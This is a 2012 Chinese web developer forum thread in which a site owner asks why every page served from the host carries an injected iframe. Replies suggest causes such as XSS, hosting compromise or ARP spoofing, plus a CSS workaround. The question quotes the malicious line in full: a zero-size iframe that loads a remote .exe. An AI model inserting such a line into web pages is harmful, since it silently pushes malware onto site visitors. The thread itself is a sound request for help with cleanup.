首页 新闻 搜索 专区 学院

页面被注入代码

0
悬赏园豆:50 [已解决问题] 解决于 2012-11-14 23:26

index.aspx文件里正常,没有如下代码,但在客户端浏览器中查看源代码最顶部发现如下代码:
<iframe src= http://sjzromeo.eicp.net/wins.exe width=0 height=0></iframe>
不知道在哪个阶段被注入的。如何修复

卤水兄的主页 卤水兄 | 初学一级 | 园豆:48
提问于:2012-11-14 15:05
< >
分享
最佳答案
1

 有可能是 机房出问题了 ,以前我们公司的所有网站都有

收获园豆:30
世界万物 | 菜鸟二级 |园豆:276 | 2012-11-14 17:27

也是这段代码?<iframe src= http://sjzromeo.eicp.net/wins.exe width=0 height=0></iframe> 
直接找机房就解决了是吧?

卤水兄 | 园豆:48 (初学一级) | 2012-11-14 18:00

@卤水兄:  没找 ,过段自己好了。 你看下同IP 或主机其他网站 有没有这个情况

世界万物 | 园豆:276 (菜鸟二级) | 2012-11-14 18:02

@随静而动: 服务器上所有网站都是这个样子

卤水兄 | 园豆:48 (初学一级) | 2012-11-14 18:09
其他回答(6)
0

不会是被跨站脚本注入了吧  楼主根据自己站点的情况具体研究下吧  搜索xxs跨站会有很多相关的东西

收获园豆:5
oppoic | 园豆:560 (小虾三级) | 2012-11-14 15:10
0

so dangerous

田林九村 | 园豆:2367 (老鸟四级) | 2012-11-14 15:25
0

楼主的站点被别人用iframe嵌套了,楼主可以给自己的网站加一个防iframe嵌套的代码,下面用css实现的,仅供参考:

  1. <style type="text/css" media="all">  
  2.      iframe {
  3.        v:expression(this.src='about:blank',this.outerHTML='');/*使用CSS属性去除所有IFRAME*/ 
  4.      }  
  5.      #myiframe {v:expression() !important}
  6. /* 如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="myiframe",
  7.     如果你的网页中没有用到IFRAME,那可以把这句代码删除,这样所有的IFRAME都将不执行 */
  8. </style>
收获园豆:5
沃奇星火 | 园豆:238 (菜鸟二级) | 2012-11-14 15:48

您这个不能根治呀!每个页面都生成了<iframe>那段代码,真不知道它是在哪个阶段被写入的。

支持(0) 反对(0) 卤水兄 | 园豆:48 (初学一级) | 2012-11-14 16:07

@卤水兄: 这个css代码写到公用的.css文件中不就好了?你的网站每个页面都会调用css文件的吧?

支持(0) 反对(0) 沃奇星火 | 园豆:238 (菜鸟二级) | 2012-11-14 16:15

@新七点: 我说不能根制意思是 既然他有本事把iframe放到我的代码里,就有可能放别的代码进去。你这个方法是可以解决燃眉之急

支持(0) 反对(0) 卤水兄 | 园豆:48 (初学一级) | 2012-11-14 16:45

@卤水兄: 根据你的问题描述,这段代码应该不是直接注入到你的代码文件里去的,而有可能是通过浏览器劫持的方式修改了客户端的浏览器功能。你可以先检查一下服务器上的文件是否包含异常代码,查一下病毒木马什么的,然后才能确定漏洞在哪里。

支持(0) 反对(0) 沃奇星火 | 园豆:238 (菜鸟二级) | 2012-11-14 16:54
0

查看引用的js文件

收获园豆:5
Qlin | 园豆:2403 (老鸟四级) | 2012-11-14 16:39
0

主要是看程序是不是有漏洞还有就是系统是不是有漏洞

收获园豆:5
chenping2008 | 园豆:9836 (大侠五级) | 2012-11-14 16:47
0

今天我们网站也出现过,具体问题还未找到

冯小强 | 园豆:202 (菜鸟二级) | 2012-11-16 09:51

往服务器装个阻止ARP攻击的软件,360安全卫士有这个功能,如果没有找到原因,可以先试一下

支持(0) 反对(0) 卤水兄 | 园豆:48 (初学一级) | 2012-11-16 09:54
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册